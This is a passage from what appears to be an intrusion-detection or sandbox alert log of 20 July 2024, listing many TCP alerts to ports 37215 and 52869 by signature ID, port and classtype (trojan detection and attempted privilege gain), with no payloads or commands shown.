                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.637175
                      SID:2829579
                      Source Port:36270
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.642551
                      SID:2025132
                      Source Port:56348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.167781
                      SID:2025132
                      Source Port:52466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:51.060408
                      SID:2027339
                      Source Port:44768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.993916
                      SID:2027339
                      Source Port:44844
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.006905
                      SID:2831300
                      Source Port:38194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:09.027075
                      SID:2027339
                      Source Port:44806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2829579
                      Source Port:54338
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.660847
                      SID:2025132
                      Source Port:59292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.874054
                      SID:2831300
                      Source Port:60092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.390246
                      SID:2027339
                      Source Port:54794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:56566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:12.234515
                      SID:2027339
                      Source Port:58290
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.113254
                      SID:2835222
                      Source Port:55470
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.470424
                      SID:2027339
                      Source Port:40172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.790100
                      SID:2025132
                      Source Port:35768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:59.992285
                      SID:2027339
                      Source Port:47032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.986393
                      SID:2027339
                      Source Port:57142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.387777
                      SID:2831300
                      Source Port:60138
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.267254
                      SID:2027339
                      Source Port:51136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:48.447183
                      SID:2025132
                      Source Port:37874
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.507489
                      SID:2831300
                      Source Port:41820
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:57.723224
                      SID:2027339
                      Source Port:45188
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2835222
                      Source Port:59984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631937
                      SID:2835222
                      Source Port:45702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.891313
                      SID:2025132
                      Source Port:35544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:57.221530
                      SID:2835222
                      Source Port:57708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.933600
                      SID:2027339
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.144153
                      SID:2027339
                      Source Port:47330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.660608
                      SID:2831300
                      Source Port:53702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.590937
                      SID:2027339
                      Source Port:42412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.485717
                      SID:2025132
                      Source Port:36340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.998794
                      SID:2831300
                      Source Port:55406
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:14.126869
                      SID:2829579
                      Source Port:47980
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.103737
                      SID:2835222
                      Source Port:36284
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.786751
                      SID:2025132
                      Source Port:55894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.081923
                      SID:2025132
                      Source Port:50626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.325103
                      SID:2025132
                      Source Port:57446
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.677933
                      SID:2027339
                      Source Port:48580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.305660
                      SID:2027339
                      Source Port:59386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.540121
                      SID:2025132
                      Source Port:60856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.058922
                      SID:2829579
                      Source Port:48232
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.454456
                      SID:2025132
                      Source Port:49386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2835222
                      Source Port:49124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.983744
                      SID:2027339
                      Source Port:40058
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:50346
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:26.043735
                      SID:2027339
                      Source Port:46620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.796509
                      SID:2025132
                      Source Port:52586
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:21.943544
                      SID:2835222
                      Source Port:48950
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.034156
                      SID:2831300
                      Source Port:45608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.971627
                      SID:2025132
                      Source Port:56016
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:20.068152
                      SID:2027339
                      Source Port:37824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.401855
                      SID:2831300
                      Source Port:40012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2829579
                      Source Port:52710
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:48880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.156820
                      SID:2835222
                      Source Port:59578
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:11.752225
                      SID:2027339
                      Source Port:48318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.225977
                      SID:2027339
                      Source Port:43060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.758699
                      SID:2027339
                      Source Port:56734
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.762774
                      SID:2025132
                      Source Port:57830
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.049279
                      SID:2835222
                      Source Port:59072
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222163
                      SID:2829579
                      Source Port:43440
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.070492
                      SID:2835222
                      Source Port:36080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.032669
                      SID:2831300
                      Source Port:54312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:12.807101
                      SID:2831300
                      Source Port:37332
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.016889
                      SID:2829579
                      Source Port:35002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.310207
                      SID:2829579
                      Source Port:41020
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.498156
                      SID:2027339
                      Source Port:38412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.144672
                      SID:2835222
                      Source Port:45890
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.840364
                      SID:2831300
                      Source Port:54362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:51.864479
                      SID:2027339
                      Source Port:57882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.795218
                      SID:2027339
                      Source Port:55440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.938818
                      SID:2835222
                      Source Port:37944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2829579
                      Source Port:58438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.755147
                      SID:2027339
                      Source Port:45994
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.783592
                      SID:2027339
                      Source Port:55066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:32.059767
                      SID:2835222
                      Source Port:45268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.474391
                      SID:2027339
                      Source Port:54626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.289823
                      SID:2027339
                      Source Port:34358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.501891
                      SID:2025132
                      Source Port:53774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:24.889164
                      SID:2835222
                      Source Port:52336
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.172994
                      SID:2831300
                      Source Port:44444
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.641430
                      SID:2025132
                      Source Port:55140
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:50.065539
                      SID:2831300
                      Source Port:34878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:25.200191
                      SID:2025132
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:04.423031
                      SID:2027339
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.085493
                      SID:2027339
                      Source Port:60514
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.991829
                      SID:2831300
                      Source Port:58460
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:58.190255
                      SID:2027339
                      Source Port:53358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.945733
                      SID:2027339
                      Source Port:33618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.070413
                      SID:2027339
                      Source Port:33184
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.175676
                      SID:2027339
                      Source Port:59638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:59652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.698859
                      SID:2027339
                      Source Port:43246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.569791
                      SID:2027339
                      Source Port:51988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.321965
                      SID:2829579
                      Source Port:57874
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.049485
                      SID:2025132
                      Source Port:43448
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.668073
                      SID:2829579
                      Source Port:35160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.062724
                      SID:2027339
                      Source Port:59740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.171169
                      SID:2027339
                      Source Port:44566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:52.599833
                      SID:2027339
                      Source Port:48540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:56.910590
                      SID:2027339
                      Source Port:37840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.258596
                      SID:2027339
                      Source Port:46492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.639011
                      SID:2829579
                      Source Port:38304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.125172
                      SID:2831300
                      Source Port:56968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.324877
                      SID:2025132
                      Source Port:55470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:48.118060
                      SID:2027339
                      Source Port:49154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.388537
                      SID:2027339
                      Source Port:44252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.636425
                      SID:2829579
                      Source Port:60540
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.048618
                      SID:2829579
                      Source Port:49156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.045640
                      SID:2835222
                      Source Port:49936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.113055
                      SID:2835222
                      Source Port:37100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.053605
                      SID:2829579
                      Source Port:43318
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.322736
                      SID:2027339
                      Source Port:37216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.710832
                      SID:2027339
                      Source Port:35548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:27.660099
                      SID:2829579
                      Source Port:38352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.068475
                      SID:2025132
                      Source Port:45506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.472037
                      SID:2025132
                      Source Port:58472
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.636583
                      SID:2027339
                      Source Port:55272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.325773
                      SID:2025132
                      Source Port:43672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:06.813916
                      SID:2831300
                      Source Port:34864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.904524
                      SID:2829579
                      Source Port:47078
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313383
                      SID:2831300
                      Source Port:53670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:03.924344
                      SID:2027339
                      Source Port:40650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.005094
                      SID:2831300
                      Source Port:41146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.259813
                      SID:2025132
                      Source Port:40310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.730585
                      SID:2835222
                      Source Port:41968
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.686153
                      SID:2027339
                      Source Port:50918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:51.113660
                      SID:2831300
                      Source Port:37010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.822392
                      SID:2829579
                      Source Port:58386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.234228
                      SID:2025132
                      Source Port:50240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.021606
                      SID:2831300
                      Source Port:49206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.054567
                      SID:2027339
                      Source Port:53286
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.556804
                      SID:2831300
                      Source Port:57658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.095698
                      SID:2829579
                      Source Port:35250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.121284
                      SID:2027339
                      Source Port:40112
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.966760
                      SID:2027339
                      Source Port:56330
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.202570
                      SID:2027339
                      Source Port:43560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.859927
                      SID:2831300
                      Source Port:53216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:54260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.813695
                      SID:2027339
                      Source Port:57422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:09.321968
                      SID:2025132
                      Source Port:51482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044223
                      SID:2829579
                      Source Port:33566
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:13.618084
                      SID:2027339
                      Source Port:45878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.069870
                      SID:2831300
                      Source Port:58724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:53.560520
                      SID:2027339
                      Source Port:43648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.995118
                      SID:2027339
                      Source Port:60430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.192052
                      SID:2829579
                      Source Port:50040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.652877
                      SID:2027339
                      Source Port:34774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.629036
                      SID:2831300
                      Source Port:45276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:41.637960
                      SID:2831300
                      Source Port:40706
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:02:53.636754
                      SID:2025132
                      Source Port:34312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.614193
                      SID:2027339
                      Source Port:59036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.926465
                      SID:2831300
                      Source Port:35840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:40.307219
                      SID:2829579
                      Source Port:34386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.374418
                      SID:2025132
                      Source Port:55916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.110964
                      SID:2025132
                      Source Port:40600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.131339
                      SID:2829579
                      Source Port:38098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.152789
                      SID:2027339
                      Source Port:38362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.044669
                      SID:2025132
                      Source Port:39594
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.095767
                      SID:2831300
                      Source Port:58042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.317774
                      SID:2027339
                      Source Port:55592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.486106
                      SID:2027339
                      Source Port:54728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.747300
                      SID:2027339
                      Source Port:57584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.947006
                      SID:2027339
                      Source Port:60546
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.638880
                      SID:2831300
                      Source Port:38024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:32.034562
                      SID:2829579
                      Source Port:48106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.177552
                      SID:2025132
                      Source Port:58512
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.334933
                      SID:2829579
                      Source Port:35100
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.131607
                      SID:2025132
                      Source Port:33750
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:43.567356
                      SID:2831300
                      Source Port:39516
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.207937
                      SID:2027339
                      Source Port:37816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.357440
                      SID:2025132
                      Source Port:43918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:42.466150
                      SID:2027339
                      Source Port:54924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.963815
                      SID:2027339
                      Source Port:42942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.117484
                      SID:2025132
                      Source Port:48780
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.168569
                      SID:2835222
                      Source Port:44702
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.936545
                      SID:2835222
                      Source Port:45502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.053061
                      SID:2835222
                      Source Port:38084
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.055683
                      SID:2835222
                      Source Port:58700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
